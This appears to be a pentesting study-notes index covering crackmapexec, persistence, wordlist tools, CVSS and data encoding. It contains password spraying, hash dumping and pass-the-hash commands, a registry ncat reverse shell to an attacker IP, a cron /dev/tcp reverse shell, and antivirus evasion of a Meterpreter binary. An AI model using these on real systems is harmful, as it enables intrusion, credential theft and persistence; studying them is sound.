    • smb
    • ssh
    • mssql
    • ldap
    • winrm

    The most used protocol is smb as port 445 is commonly open.

    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#installation","title":"Installation","text":"
    sudo apt-get -y install crackmapexec\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-usage","title":"Basic usage","text":"

    Main syntax

    crackmapexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>\n
    # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targeting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated on the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#rce-with-crackmapexec","title":"RCE with crackmapexec:","text":"
    #  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-technique","title":"Basic technique","text":"

    Once we have access to a domain:

    1. Enumerate users and machines from our foothold machine: we will obtain all registered users and their hashes.

    2. See if any of those users is present on another machine in the domain. Also check whether they have admin access.

    3. The goal would be to dump ntds.dit.

    With the krbtgt hash you can forge a golden ticket, and with a machine account hash such as DC$ a silver ticket.

    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#what-is-a-sam-hash-like","title":"What is a SAM hash like?","text":"

    Take the Administrator one:

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n

    Basically, it has 4 parts:

                    user : id: LM-authentication : NTLM\n

    For the purpose of using the hash with CrackMapExec, we will use the NTLM part.
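    For instance, the NTLM part can be cut out of the dumped line (a minimal sketch using the hash above):

    echo 'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::' | cut -d: -f4\n# 31d6cfe0d16ae931b73c59d7e0c089c0\n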

    ","tags":["windows","dump hashes","passwords"]},{"location":"create-a-registry/","title":"Create a Registry","text":"

    Registry keys on the victim machine may be used to persist a connection back to the attacker machine.

    ","tags":["privilege escalation"]},{"location":"create-a-registry/#regedit","title":"Regedit","text":"
    Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n\nRight-Button > New > String value\n\nWe name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>\n\nWe edit the registry and we add the path to the executable file and some commands\u00a0 in the Value data:\n\n\u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n\nFor instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
    ","tags":["privilege escalation"]},{"location":"create-a-registry/#python-script-that-add-a-binary-to-the-registry","title":"Python script that add a binary to the Registry","text":"

    See Making your binary persistent

    ","tags":["privilege escalation"]},{"location":"cron-jobs/","title":"Cron jobs","text":"

    In Linux, a common way of maintaining scheduled tasks is through cron jobs. The equivalent in Windows would be a scheduled task. There are specific files and directories that we may be able to utilize to add new cron jobs if we have write permissions on them:

    1. /etc/crontab

    2. /etc/cron.d

    3. /var/spool/cron/crontabs/root

    Basically, the principle behind this technique is:

    • writing to a file or directory called by a cron job,
    • including a bash script with a reverse shell command,
    • which should send us a reverse shell when executed (see the sketch below).
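    A minimal sketch of the technique, assuming we can write to /etc/crontab and that 10.10.14.2:4444 is a hypothetical listener on our attacker machine:

    # Append a job that runs every minute as root and calls back to us\necho '* * * * * root bash -c \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\"' >> /etc/crontab\n\n# On the attacker machine\nnc -lnvp 4444\n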
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"crunch/","title":"crunch - A dictionary generator","text":"

    Crunch generates combinations of words and manglings to be used later as attack dictionaries.

    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#installation","title":"Installation","text":"

    Preinstalled in Kali Linux. To install:

    sudo apt install crunch\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#basic-commands","title":"Basic commands","text":"
    # Generates words from <number1> to <number2> with the specified characters.\ncrunch <number1> <number2> <characters> -o file.txt\n# <number1>: minimum number of characters in the password\n# <number2>: maximum number of characters in the password\n# <characters>: the characters included in the set\n# -o: Send output to file.txt\n# More flags exist (see the man page)\n
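    For example, to generate all four-digit numeric PINs (an illustrative run):

    crunch 4 4 0123456789 -o pins.txt\n# 10000 lines, from 0000 to 9999\n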
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#resources","title":"Resources","text":"
    • Advanced crunch: https://secf00tprint.github.io/blog/passwords/crunch/advanced/en.
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cryptography/","title":"Cryptography","text":"","tags":["crytography"]},{"location":"cryptography/#encryption-technologies","title":"Encryption Technologies","text":"Encryption Technology Description UNIX crypt(3) Crypt(3) is a traditional UNIX encryption system with a 56-bit key. Traditional DES-based DES-based encryption uses the Data Encryption Standard algorithm to encrypt data. bigcrypt Bigcrypt is an extension of traditional DES-based encryption. It uses a 128-bit key. BSDI extended DES-based BSDI extended DES-based encryption is an extension of the traditional DES-based encryption and uses a 168-bit key. FreeBSD MD5-based (Linux & Cisco) FreeBSD MD5-based encryption uses the MD5 algorithm to encrypt data with a 128-bit key. OpenBSD Blowfish-based OpenBSD Blowfish-based encryption uses the Blowfish algorithm to encrypt data with a 448-bit key. Kerberos/AFS Kerberos and AFS are authentication systems that use encryption to ensure secure entity communication. Windows LM Windows LM encryption uses the Data Encryption Standard algorithm to encrypt data with a 56-bit key. DES-based tripcodes DES-based tripcodes are used to authenticate users based on the Data Encryption Standard algorithm. SHA-crypt hashes SHA-crypt hashes are used to encrypt data with a 256-bit key and are available in newer versions of Fedora and Ubuntu. SHA-crypt and SUNMD5 hashes (Solaris) SHA-crypt and SUNMD5 hashes use the SHA-crypt and MD5 algorithms to encrypt data with a 256-bit key and are available in Solaris. ... and many more.","tags":["crytography"]},{"location":"cryptography/#symmetric-encryption","title":"Symmetric Encryption","text":"

    There is only a shared secret key.

    ","tags":["crytography"]},{"location":"cryptography/#asymmetric-pki-encryption","title":"Asymmetric PKI Encryption","text":"

    There is a public and a private key.

    ","tags":["crytography"]},{"location":"cryptography/#digital-certificate","title":"Digital certificate","text":"

    A digital certificate is an electronic document used to identify an individual, a server, an organization, or some other entity and associate that entity with a public key.

    Digital certificates are used in PKI (public key infrastructure) encryption. We can think of a digital certificate as our \"online\" digital credential that verifies our identity.

    Digital certificates are issued by Certificate Authorities (CA).

    ","tags":["crytography"]},{"location":"cryptography/#emails","title":"Emails","text":"

    Symmetric and asymmetric encryption don't guarantee Integrity, Authentication or Non-Repudiation. They only guarantee Confidentiality.

    To achieve Integrity, Authentication and Non-Repudiation, emails use a digital signature.

    ","tags":["crytography"]},{"location":"cryptography/#windows-encrypted-file-system","title":"Windows Encrypted File System","text":"

    Windows Encrypting File System (EFS) allows us to encrypt individual files and folders. BitLocker, on the other hand, is full-disk encryption.

    Windows encryption uses a combination of symmetric and asymmetric encryption, whereby:

    • A separate symmetric secret key is created for each file.
    • A digital certificate is created for the user, which holds the user's private and public pair.

    If the user's digital certificate is deleted or lost, encrypted files and folders can only be decrypted with a Windows Recovery Agent.


    Software-based encryption uses software tools to encrypt data: BitLocker, Windows EFS, VeraCrypt, 7-Zip.

    ","tags":["crytography"]},{"location":"cryptography/#cipher-block-chaining-cbc","title":"Cipher block chaining (CBC)","text":"

    Source: wikipedia

    ","tags":["crytography"]},{"location":"ctr/","title":"ctr.sh","text":"

    It collects information about SSL/TLS certificates from Certificate Transparency logs. If you visit a domain and it presents a certificate, you can extract other subdomains by using the View Certificate functionality.

    ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"ctr/#usage","title":"Usage","text":"

    In your browser, go to:

    https://crt.sh/
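    The service can also be queried from the command line (a sketch assuming the hypothetical target domain example.com and that jq is installed):

    curl -s \"https://crt.sh/?q=%25.example.com&output=json\" | jq -r '.[].name_value' | sort -u\n# %25 is a URL-encoded % wildcard, so this lists certificates issued for *.example.com\n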

    ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"cupp-common-user-password-profiler/","title":"CUPP - Common User Password Profiler","text":"

    This Common User Password Profiler tool (CUPP) generates a dictionary based on the input you provide when asked for names, dates, places...

    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#installation","title":"Installation","text":"

    Github repo: https://github.com/Mebus/cupp.

    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#basic-commands","title":"Basic commands","text":"
    python cupp.py <flag options>\n#    -i      Interactive questions for user password profiling\n#    -w      Use this option to profile existing dictionary, or WyD.pl output to make some pwnsauce :)\n#    -l      Download huge wordlists from repository\n#    -a      Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.\n#    -v      Version of the program\n
    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"curl/","title":"curl","text":"","tags":["bash","tools","pentesting"]},{"location":"curl/#basic-usage","title":"Basic usage","text":"
    curl -i -L $host -v\n# -L: Follow redirections\n# -i: Include headers in the response \n# -v: verbose\n\ncurl -T file.txt $ip\n# -T, --upload-file <file>: transfers the specified local file to the remote URL. -T uses the PUT HTTP method\n\ncurl -o target/path/filename URL\n# -o: to specify a location/filename\n\n# Upload a File\ncurl -F \"Filedata=@./shellsample.php\" URL\n\n# Sends a GET request\ncurl -X GET $ip\n\n# Sends a HEAD request\ncurl -I $ip\n\n# Sends an OPTIONS request\ncurl -X OPTIONS $ip\n\n# Sends a POST request with parameters name and password in the body data\ncurl -X POST $ip -d \"name=username&password=password\" -v\n\n# Upload a file with a PUT method\ncurl $ip/uploads/ --upload-file hello.txt\n\n# Delete a file\ncurl -X DELETE $ip/uploads/hello.txt\n
    ","tags":["bash","tools","pentesting"]},{"location":"cve-common-vulnerabilities-and-exposures/","title":"cve","text":"

    Common Vulnerabilities and Exposures (CVE) is a publicly available catalog of security issues sponsored by the United States Department of Homeland Security (DHS).

    Each security issue has a unique CVE ID number assigned by the CVE Numbering Authority (CNA). The purpose of creating a unique CVE ID number is to create a standardization for a vulnerability or exposure as a researcher identifies it.

    "},{"location":"cve-common-vulnerabilities-and-exposures/#stages-of-obtaining-a-cve","title":"Stages of Obtaining a CVE","text":"

    Stage 1: Identify if CVE is Required and Relevant.

    Stage 2: Reach Out to Affected Product Vendor.

    Stage 3: Identify if Request Should Be For Vendor CNA or Third Party CNA.

    Stage 4: Requesting CVE ID Through CVE Web Form.

    Stage 5: Confirmation of CVE Form.

    Stage 6: Receival of CVE ID.

    Stage 7: Public Disclosure of CVE ID.

    Stage 8: Announcing the CVE.

    Stage 9: Providing Information to The CVE Team.

    If an issue is not responsibly disclosed to a vendor, real threat actors may be able to leverage the issues for criminal use, also referred to as a zero day or an 0-day.

    "},{"location":"cvss-common-vulnerability-scoring-system/","title":"Common Vulnerability Scoring System","text":"

    Source: Hack The Box Academy

    The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of software vulnerabilities in an objective way. For that, it uses standardized, vendor- and platform-agnostic vulnerability scoring methodologies.

    Scores range from 0.0 to 10.0 (10.0 being the most severe):

    • Low: 0.1-3.9.
    • Medium: 4.0-6.9
    • High: 7.0-8.9
    • Critical: 9.0-10.0

    CVSS uses a combination of base, temporal, and environmental metrics

    CVSS is not a risk rating framework (for that you have OWASP Risk Rating, for instance); typical out-of-scope impacts: number of customers on a product line, monetary losses due to a breach, ...

    There are three metric groups: the Base metric group, the Temporal metric group, and the Environmental metric group.

    The convention when quoting a CVSS score is to also include its vector.
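    For example, a network-based, low-complexity, unauthenticated vulnerability with high impact on confidentiality, integrity and availability would be quoted as (CVSS v3.1 notation):

    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n# Base Score: 9.8 (Critical)\n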

    ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#metric-groups","title":"Metric groups","text":"

        The Base score reflects the severity of a vulnerability according to its intrinsic characteristics, which are constant over time, and assumes the reasonable worst-case impact across different deployed environments:
    

    • Exploitability metrics: The Exploitability metrics are a way to evaluate the technical means needed to exploit the issue.

          • Attack Vector (AV):
    
            • Network (N): the attack can be launched remotely, across one or more routers.
            • Adjacent (A): the attack must be launched from the same network segment (VPN included).
            • Local (L): the attacker can log in locally into the system.
            • Physical (P): the attacker needs to be physically present.
    
          • Attack Complexity (AC): conditions that must be present in order for the attack to exist.
    

            • Low (L): there are no specialized access conditions needed to perform the attack.
            • High (H): the attacker must invest in preparation before the attack (for instance, gathering knowledge about configurations, or setting up software or licenses).
    
          • Privileges Required (PR):
    

            • None (N): the attacker is unauthorized prior to the attack.
            • Low (L): the attacker needs basic user-level access.
            • High (H): the attacker needs privileges that provide significant control over the vulnerable component.
    
          • User Interaction (UI): whether user participation is needed.
    

            • None (N): the attack can be performed without any action from the user's side.
            • Required (R): a user has to take some action, e.g. visit a page and click a link.
    
        • Scope: which component is impacted by the vulnerability, i.e. whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. If the Scope is Changed (C), then the Impact metrics need to be re-evaluated.
    

          • Changed (C): the exploited vulnerability affects resources managed by a different security authority.
    
      • Unchanged (U): the exploited vulnerability can only affect resources managed by the same security authority.
    • Impact metrics: CIA. The Impact metrics represent the repercussions of successfully exploiting an issue and what is impacted in an environment, and it is based on the CIA triad.

      • Confidentiality (C): Impact to the confidentiality if the information resources are accessed.

            • None (N): no data is revealed.
            • Low (L): some data is accessed, but the attacker does not control what is obtained, or the impact is limited.
            • High (H): total loss of confidentiality; access to restricted information is obtained, and the disclosed information is critical.
    
      • Integrity (I):

            • None (N): no loss of integrity.
            • Low (L): modification of data is possible, but the attacker does not control the consequence, or the amount of modification is limited.
            • High (H): total loss of integrity; the attacker can modify any data protected by the impacted component.
    
      • Availability (A):

            • None (N): no impact to availability.
            • Low (L): performance is reduced or there are interruptions in resource availability.
            • High (H): total loss of availability; the attacker can fully deny access to resources of the impacted component.
    

    Temporal metric group: the characteristics of a vulnerability that may change over time but not across user environments.

    • Exploit Code Maturity (E) metric represents the probability of an issue being exploited based on ease of exploitation techniques.

      • Not Defined
      • High
      • Functional
      • Proof-of-Concept
      • Unproven.
    • Remediation Level (RL) is used to identify the prioritization of a vulnerability.

      • Not Defined
      • Unavailable
      • Workaround
      • Temporary Fix
      • Official Fix
    • Report Confidence (RC) represents the validation of the vulnerability and how accurate the technical details of the issue are.

      • Not Defined
      • Confirmed
      • Reasonable
      • Unknown

        Environmental metric group: the characteristics of a vulnerability that are relevant and unique to a particular user's environment.
    

        • Security Requirements (CR, IR, AR) and Modified Base metrics.
    

        All metrics are scored under the assumption that the attacker has already located and identified the vulnerability. Analysts need not consider the means by which the vulnerability was identified or the difficulty of identifying it.
    

    ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#cvss-calculator","title":"cvss Calculator","text":"

        NIST calculator
    

    ","tags":["cvss"]},{"location":"darkarmour/","title":"darkarmour","text":"

        Store and execute an encrypted Windows binary from inside memory, without a single bit touching disk: generate an undetectable version of a PE executable.
    

    ","tags":["payloads","tools"]},{"location":"darkarmour/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/bats3c/darkarmour.

        It uses the Python stdlib, so there is no need to worry about Python dependencies; the only issue you could come across are binary dependencies. The required binaries are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probably osslsigncode soon as well). These can all be installed via apt.
    

    sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode\n
    ","tags":["payloads","tools"]},{"location":"darkarmour/#basic-usage","title":"Basic usage","text":"
        ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5\n\n\n# -f: file to crypt, assumed as binary if not told otherwise\n# -e: encryption algorithm to use (xor)\n# -S: SHELLCODE file containing the shellcode, needs to be in the 'msfvenom -f raw' style format \n# -b: provide if file is a binary exe\n# -d, --dll: use reflective dll injection to execute the binary inside another process\n# -s: provide if the file is c source code\n# -k: key to encrypt with, randomly generated if not supplied\n# -l, --loop: number of levels of encryption\n# -o: name of outfile; if not provided, a random filename is assigned\n
    
    ","tags":["payloads","tools"]},{"location":"data-encoding/","title":"Data encoding","text":"Resources
    • All ASCII codes
    • All UTF-8 enconding table and Unicode characters
    • Charset converter
    • HTML\u00a0URL Encoding\u00a0Reference

        Encoding ensures that data like text, images, files and multimedia can be effectively communicated and displayed through web technologies. It typically involves converting data from its original form into a format suitable for digital transmission and storage while preserving its meaning and integrity. Encoding plays a crucial role in discovering and understanding how a web application handles different types of input, especially when those inputs contain special characters, binary data, or unexpected sequences.
    

    Encoding is an essential aspect of web application penetration testing, particularly when dealing with input validation, data transmission, and various attack vectors. It involves manipulating data or converting it into a different format, often to bypass security measures, discover vulnerabilities, or execute attacks.

    "},{"location":"data-encoding/#basic-concepts","title":"Basic concepts","text":"

    A \"charset,\" short for character set, is a collection of characters, symbols, and glyphs that are associated with unique numeric codes or code points. Character sets define how textual data is mapped to binary values in computing systems. Examples of charsets are: ASCII, Unicode, Latin-1 etc.

    Character encoding is the representation in bytes of the symbols of a charset.

    "},{"location":"data-encoding/#ascii-encoding","title":"ASCII encoding","text":"

        URLs are permitted to contain only the printable characters in the US-ASCII character set: those in the range 0x20-0x7e inclusive. The URL-encoded form of any character is the % prefix followed by the character's two-digit ASCII code expressed in hexadecimal.
    

    ASCII stands for \"American Standard Code for Information Interchange.\" It's a widely used character encoding standard containing 128 characters that was developed in the 1960s to represent text and control characters in computers and communication equipment. ASCII defines a set of codes to represent letters, numbers, punctuation, and control characters used in the English language and basic communication. It primarily covers English characters, numbers, punctuation, and control characters, using 7 or 8 bits to represent each character. ASCII cannot be used to display symbols from other languages like Chinese.

    All ASCII codes

        %3d =  |  %25 %  |  %20 space  |  %00 null byte  |  %0a new line  |  %27 '  |  %22 \"  |  %2e .  |  %2f /  |  %28 (  |  %29 )  |  %5e ^  |  %3f ?  |  %3c <  |  %3e >  |  %3b ;  |  %23 #  |  %2d -  |  %2a *  |  %3a :  |  %5c \\  |  %5b [  |  %5d ]
    

    Characteristics:

    • Character Set: ASCII includes a total of 128 characters, each represented by a unique 7-bit binary code. These characters include uppercase and lowercase letters, digits, punctuation marks, and some control characters.
    • 7-Bit Encoding: In ASCII, each character is encoded using 7 bits, allowing for a total of 2^7 (128) possible characters. The most significant bit is often used for parity checking in older systems.
    • Standardization: ASCII was established as a standard by the American National Standards Institute (ANSI) in 1963 and later became an international standard.
    • Basic Character Set:

      • Uppercase letters: A-Z (65-90)
      • Lowercase letters: a-z (97-122)
      • Digits: 0-9 (48-57)
      • Punctuation: Various symbols such as !, @, #, $, %, etc.
      • Control characters: Characters like newline, tab, carriage return, etc.
    • Compatibility: ASCII is a subset of many other character encodings, including more comprehensive standards like Unicode. The first 128 characters of the Unicode standard correspond to the ASCII characters.

    • Limitations: ASCII is primarily designed for English text and doesn't support characters from other languages or special symbols.
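    
        A quick way to check a character's ASCII code from a bash shell (the leading single quote in the argument makes printf print the character's numeric code):
    
        # Decimal ASCII code of the character A\nprintf '%d' \"'A\"   # prints 65\n\n# Character from its hexadecimal code\nprintf '\x41'   # prints A\n
    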
    "},{"location":"data-encoding/#unicode-encoding","title":"Unicode encoding","text":"

    Unicode is a character set standard that aims to encompass characters from all writing systems and languages used worldwide. Unlike early encoding standards like ASCII, which were limited to a small set of characters, Unicode provides a unified system for representing a vast range of characters, symbols, and glyphs in a consistent manner. It enables computers to handle text and characters from diverse languages and scripts, making it essential for internationalization and multilingual communication.

    \"UTF\" stands for \"Unicode Transformation Format.\" It refers to different character encoding schemes within the Unicode standard that are used to represent Unicode characters as binary data. Unicode has three main character encoding schemes: UTF-8, UTF-16 and UTF-32. The trailing number indicates the number of bits to represent code points.

    All UTF-8 enconding table and Unicode characters

    "},{"location":"data-encoding/#utf-8-unicode-transformation-format-8-bit","title":"UTF-8 (Unicode Transformation Format 8-bit)","text":"

    UTF-8 is a variable-length character encoding scheme. It uses 8-bit units (bytes) to represent characters. ASCII characters are represented using a single byte (backward compatibility).

    Non-ASCII characters are represented using multiple bytes, with the number of bytes varying based on the character's code point.

    UTF-8 is widely used on the web and in many applications due to its efficiency and compatibility with ASCII.
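    
        A quick sketch of this from a bash shell (assuming a printf that supports \u escapes, e.g. bash 4.2+, and the xxd utility): the code point U+00E9 (\u00e9) becomes two bytes in UTF-8.
    
        printf '\u00e9' | xxd\n# 00000000: c3a9\n
    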

    "},{"location":"data-encoding/#utf-16-unicode-transformation-format-16-bit","title":"UTF-16 (Unicode Transformation Format 16-bit)","text":"

    UTF-16 is a variable-length character encoding scheme. It uses 16-bit units (two bytes) to represent characters. Characters with code points below 65536 (BMP - Basic Multilingual Plane) are represented using two bytes.

    Characters with higher code points (outside the BMP) are represented using four bytes (surrogate pairs).

    UTF-16 is commonly used in programming languages like Java and Windows systems.
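    
        The same code point can be inspected in UTF-16 with iconv (a sketch; note the single 16-bit unit 0x00E9 versus UTF-8's two bytes 0xC3 0xA9):
    
        printf '\u00e9' | iconv -f UTF-8 -t UTF-16BE | xxd\n# 00000000: 00e9\n
    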

    "},{"location":"data-encoding/#html-encoding","title":"HTML encoding","text":"

    HTML encoding, also known as HTML entity encoding, involves converting special characters and reserved symbols into their corresponding HTML entities to ensure that they are displayed correctly in web browsers and avoid any unintended interpretation as HTML code.

    HTML encoding is crucial for maintaining the integrity of web content and preventing issues such as cross-site scripting (XSS) attacks. HTML entities are sequences of characters that represent special characters, symbols, and reserved characters in HTML.

    They start with an ampersand (&) and end with a semicolon (;). When the browser encounters an entity in an HTML page it will show the symbol to the user and will not interpret the symbol as an HTML language element.

        &lt; < (less than sign)  |  &gt; > (greater than sign)  |  &amp; & (ampersand)  |  &quot; \" (double quotation mark)  |  &apos; ' (apostrophe)  |  &nbsp; (non-breaking space)  |  &mdash; (em dash \u2014)  |  &copy; (copyright symbol \u00a9)  |  &reg; (registered trademark symbol \u00ae)  |  &hellip; (ellipsis ...)
    
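    
        Most server-side languages ship an encoder. A quick sketch with PHP's htmlspecialchars from the command line:
    
        php -r 'echo htmlspecialchars(\"<script>alert(1)</script>\");'\n# &lt;script&gt;alert(1)&lt;/script&gt;\n
    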

    In addition, any character can be HTML encoded using its ASCII code in decimal form:

    &#34; \" &#39; '

        or by using its ASCII code in hexadecimal form (prefixed by an x):
    

    &#x22; \" &#x27; '"},{"location":"data-encoding/#url-encoding","title":"URL Encoding","text":"

    HTML\u00a0URL Encoding\u00a0Reference

    URL encoding, also known as percent-encoding, is a process used to encode special characters, reserved characters, and non-ASCII characters into a format that is safe for transmission within URLs (Uniform Resource Locators) and URI (Uniform Resource Identifiers).

    URL encoding replaces unsafe characters with a \"%\" sign followed by two hexadecimal digits that represent the ASCII code of the character. This allows URLs to be properly interpreted by web browsers and other network components. URLs sent over the Internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are present in a URL, encoding them is required.

    This encoding is important because it limits the characters to be used in a URL to a subset of specific characters:

        • Unreserved Chars - [a-zA-Z] [0-9] [- . _ ~]
    
    • Reserved Chars - : / ? # [ ] @ ! $ & \" ( ) * + , ; = %

        Other characters are encoded using a percent char (%) plus two hexadecimal digits. Although it may appear to be one, URL-encoding is not a security feature. It is only a method for sending data across the Internet, though in some cases it can shrink (or enlarge) the attack surface.
    

    Generally, web browsers (and other client-side components) automatically perform URL-encoding and, if a server-side script engine is present, it will automatically perform URL-decoding.

        %23 #  |  %3F ?  |  %24 $  |  %26 &  |  %25 %  |  %2F /  |  %2B +  |  <space> %20 or +
    
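    
        From the command line, Python's urllib is a handy encoder/decoder (a sketch; note that quote() leaves / unescaped by default):
    
        python3 -c 'from urllib.parse import quote; print(quote(\"a b/c?\"))'\n# a%20b/c%3F\n\npython3 -c 'from urllib.parse import unquote; print(unquote(\"a%20b%2Fc%3F\"))'\n# a b/c?\n
    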

        The character set (which determines how data is URL-encoded when submitted) is declared in the meta Content-Type tag:
    

        # before HTML5\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n\n# With HTML5\n<meta charset=\"utf-8\">\n
    

    This is how you define that HTML meta tag in some languages:

    # PHP\nheader('Content-type: text/html; charset=utf8');\n\n# ASP.NET\n<%Response.charset=\"utf-8\"%>\n\n# JSP\n<%@ page contentType=\"text/html; charset=UTF-8\" %>\n
    "},{"location":"data-encoding/#base64-encoding","title":"Base64 encoding","text":"

        Base64 is a scheme that allows any binary data (images, audio files, and other non-text data) to be safely represented using solely printable ASCII characters.
    

        Base64 is commonly used for encoding email attachments for safe transmission over SMTP. It's also used for encoding user credentials in Basic HTTP authentication.
    

    "},{"location":"data-encoding/#how-it-works","title":"How it works","text":"

    Encoding

        Base64 encoding processes input data in blocks of 3 bytes (24 bits) and divides them into 4 chunks of 6 bits each. Each 6-bit chunk can take 64 different values, each of which maps to a character in the following set:
    

    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\n

    Different variations of Base64 encoding may use different characters for the last two positions (+ and /).

        If the final block of input data contains fewer than 3 bytes, the output is padded with one or two equals-sign (=) characters.
    

    Decoding

    Base64 decoding is the reverse process. The encoded Base64 string is divided into segments of four characters. Each character is converted back to its 6-bit value, and these values are combined to reconstruct the original binary data.
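    
        A quick check from a Linux shell with the coreutils base64 tool (using the same sample string as the PHP/Javascript examples below):
    
        echo -n 'encode this string' | base64\n# ZW5jb2RlIHRoaXMgc3RyaW5n\n\necho -n 'ZW5jb2RlIHRoaXMgc3RyaW5n' | base64 -d\n# encode this string\n
    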

    Use cases

    • Binary Data in Text Contexts: Web applications often deal with binary data such as images, audio, or files. Since URLs, HTML, and other text-based formats can't directly handle binary data, Base64 encoding is used to represent this binary data as text. This allows binary data to be included in places that expect text, such as in HTML or JSON responses.
    • Data URL Embedding: Data URLs are a way to embed small resources directly into the HTML or CSS code. These URLs include the actual resource data in Base64-encoded form, eliminating the need for separate HTTP requests. For example, an image can be embedded directly in the HTML using a Data URL.
    • Minimization of Requests: By encoding small images or icons as Data URLs within CSS or HTML, web developers can reduce the number of requests made to the server, potentially improving page load times.
    • Simplification of Resource Management: Embedding resources directly into HTML or CSS can simplify resource management and deployment. Developers don't need to worry about file paths or URLs.
    • Offline Storage: In certain offline or single-page applications, Base64-encoded data can be stored in local storage or indexedDB for quick access without the need to fetch resources from the server.

    Encoding/decoding in Base64:

        # PHP Example\nbase64_encode('encode this string');\nbase64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Javascript example\nwindow.btoa('encode this string');\nwindow.atob('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Handling Unicode in javascript requires previous encoding. The escapes and encodings are required to avoid exceptions with characters out of range\nwindow.btoa(unescape(encodeURIComponent('encode this string')));\ndecodeURIComponent(escape(window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n')));\n
    
    "},{"location":"data-encoding/#base-36-encoding-scheme","title":"Base 36 encoding scheme","text":"

    It's the most compact, case-insensitive, alphanumeric numeral system using ASCII characters. The scheme's alphabet contains all digits [0-9] and Latin letters [A-Z].

        Base 10: 1294870408610 -> Base 36: GIUSEPPE
    

    Base 36 Encoding scheme is used in many real-world scenarios.

    Converting Base36 to decimal:

    # Number Base36 OHPE to decimal base\n\n# PHP Example: base_convert()\nbase_convert(\"OHPE\",36,10);\n\n# Javascript example: toString\n(1142690).toString(36)\nparseInt(\"ohpe\",36)\n
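    
        Bash can also do this conversion natively with its base#value arithmetic syntax (digits 0-9 and letters a-z, case-insensitive):
    
        echo $((36#ohpe))\n# 1142690\n
    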
    "},{"location":"data-encoding/#visual-spoofing-attack","title":"Visual spoofing attack","text":"

        It's one of the possible attacks that can be performed with Unicode: homoglyphs (characters from other scripts that look identical or very similar to Latin ones, such as Cyrillic \u0430 vs Latin a) are used to spoof domain names, usernames or other identifiers.
    

    A tool for generating visual spoofing attacks: https://www.irongeek.com/homoglyph-attack-generator.php

    Paper

    "},{"location":"data-encoding/#multiple-encodingsdecodings","title":"Multiple encodings/decodings","text":"

        Sometimes encoding and decoding are applied multiple times, which can also be used to bypass security measures that only decode input once.
    
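    
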